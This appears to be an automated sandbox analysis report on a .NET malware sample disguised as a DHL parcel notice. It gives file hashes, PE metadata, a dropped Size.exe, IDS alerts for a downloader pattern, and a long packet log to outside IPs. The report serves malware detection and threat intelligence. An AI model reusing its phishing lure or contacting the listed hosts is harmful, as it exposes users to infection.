Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Size.exe

Download File

Process:	C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	6.181582124523985
Encrypted:	false
SSDEEP:	1536:RheD62hx/gPCCXvdkYhzGG0EN1p/dnfkNH+zZk6dRQRYaf+EUtptiJhhDZiqb4Cn:RheD62hx/gPzdkPGNhC6SfBJhhDZxb4k
MD5:	EFC42AEBB5315984C43B7267F47217F0
SHA1:	97DD02A97BABC3E23B0B627C8A7F6B2570AE168F
SHA-256:	E5F020C3E75605569ADE89E83E50675F2F676695F263F6D8A28AD5E7B6EA2F19
SHA-512:	103F8ADDB0A846FB20DD5F53863BC13691CCBEA3899317ACA237B274D75868C832F917D2D549FFEC01D6523BA775F74DEC5EFE8CBE3DEA44AC50EDC6FA6053E7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-g.................r.............. ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text....q... ...r.................. ..`.rsrc................t..............@..@.reloc...............z..............@..B.......................H.......0...h...............h............................................0..........(......0../.........(....}.......}......\|......(...+..\|....(.....(....&..0.............s.... .i..(....s....(....o.......&.....9.... \|i..(....(..... Sm..(....(.....s..........o......s...........s............io......o......$..,...o.......,...o.......,...o.......4......!$........t...........h...........V.L.......B(....(....o....V(.... Nm..(....o....v(.... .n..(.... .......o........0......

C:\Users\user\AppData\Roaming\Size.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.181582124523985
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
File size:	97'280 bytes
MD5:	efc42aebb5315984c43b7267f47217f0
SHA1:	97dd02a97babc3e23b0b627c8a7f6b2570ae168f
SHA256:	e5f020c3e75605569ade89e83e50675f2f676695f263f6d8a28ad5e7b6ea2f19
SHA512:	103f8addb0a846fb20dd5f53863bc13691ccbea3899317aca237b274d75868c832f917d2d549ffec01d6523ba775f74dec5efe8cbe3dea44ac50edc6fa6053e7
SSDEEP:	1536:RheD62hx/gPCCXvdkYhzGG0EN1p/dnfkNH+zZk6dRQRYaf+EUtptiJhhDZiqb4Cn:RheD62hx/gPzdkPGNhC6SfBJhhDZxb4k
TLSH:	F2935B7C638CAE33CF6C257CD0B181856370C2B7C20BD7AB7994AEE46591B6B05163DA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-g.................r............... ........@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4191ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x672DA00B [Fri Nov 8 05:22:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x19198	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0x600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x171f4	0x17200	428dafad0171d23e01d8b5816b9775bc	False	0.5014252533783784	data	6.233783420860669	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1a000	0x600	0x600	5dae9643c8279a62d1dacfa4145d5f26	False	0.41015625	data	4.039567037670019	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1c000	0xc	0x200	61fe551d2318d9ac17ad6d06db91fc36	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1a0a0	0x30c	data			0.4217948717948718
RT_MANIFEST	0x1a3ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-09T09:20:34.319246+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49705	162.55.60.2	80	TCP
2024-11-09T09:20:40.580890+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.5	49706	TCP
2024-11-09T09:20:56.346798+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	56543	162.55.60.2	80	TCP
2024-11-09T09:21:02.724433+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.5	59352	TCP
2024-11-09T09:21:04.029537+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.5	59358	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 9, 2024 09:20:21.689102888 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:21.689152002 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:21.689246893 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:21.702913046 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:21.702931881 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:22.761030912 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:22.761105061 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:22.772248030 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:22.772279978 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:22.772589922 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:22.823426008 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:22.830028057 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:22.875330925 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.137316942 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.137341022 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.137347937 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.137439966 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:23.137470007 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.182543993 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:23.252909899 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.252929926 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.252969027 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.253175020 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:23.299612999 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.299628973 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.299750090 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:23.414971113 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.414993048 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.415060997 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:23.427886963 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.427900076 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.428006887 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:23.532059908 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.532075882 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.532247066 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:23.545052052 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.545064926 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.545145988 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:23.649079084 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.649368048 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:23.662273884 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.662360907 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:23.765815020 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.766109943 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:23.778997898 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.779103994 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:23.836905956 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.837083101 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:23.895814896 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.895919085 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:23.953516960 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:23.953605890 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.012737036 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.012882948 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.014456987 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.014528036 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.129144907 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.129293919 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.130860090 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.130934000 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.187138081 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.187299967 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.246980906 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.247138023 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.249038935 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.249109030 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.362726927 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.362883091 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.364434004 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.364521980 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.366446018 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.366512060 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.667629957 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.667650938 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.667809963 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.669698000 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.669780016 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.671763897 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.671832085 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.673788071 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.673880100 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.675184965 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.675270081 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.676810026 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.676913977 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.713278055 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.713452101 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.714587927 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.714658022 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.754398108 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.754518032 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.771675110 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.771832943 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.831042051 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.831161976 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.871474981 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.871571064 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.888056040 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.888168097 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.947232962 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.947398901 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:24.987835884 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:24.987947941 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.004729033 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.004834890 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.045244932 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.045344114 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.064641953 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.064721107 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.105145931 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.105225086 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.122035980 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.122129917 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.180676937 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.180851936 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.182303905 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.182377100 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.222347975 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.222449064 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.278886080 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.279022932 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.297627926 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.297702074 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.299057007 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.299124002 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.339298010 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.339436054 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.355729103 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.355849981 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.414252996 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.414460897 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.415642023 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.415725946 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.456111908 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.456267118 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.457427025 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.457498074 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.512974024 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.513179064 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.531886101 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.532006979 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.572844982 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.573003054 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.574208021 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.574282885 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.629081011 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.629271984 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.647768021 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.647842884 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.689312935 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.689408064 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.690726995 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.690793037 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.706083059 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.706182957 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.746670961 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.746752977 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.765083075 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.765177011 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.807259083 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.807499886 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.808665991 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.808881998 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.823040009 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.823203087 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.863703966 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.864016056 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.922748089 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.922947884 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.924115896 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.924191952 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.925713062 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.925779104 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.940012932 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.940155029 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:25.980031967 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:25.980246067 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.000771046 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.000935078 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.040594101 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.040783882 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.042057037 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.042129993 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.043631077 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.043715954 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.057595015 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.057703972 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.116221905 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.116449118 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.166974068 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.167156935 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.168948889 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.169035912 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.170391083 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.170454025 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.174776077 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.174864054 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.213736057 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.213872910 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.231918097 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.232028961 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.284353018 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.284499884 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.286078930 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.286168098 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.286765099 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.286850929 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.290688992 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.290762901 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.332103014 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.332201004 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.350302935 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.350372076 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.402475119 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.402640104 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.404237986 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.404345036 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.404366970 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.404449940 CET	49704	443	192.168.2.5	185.78.221.73
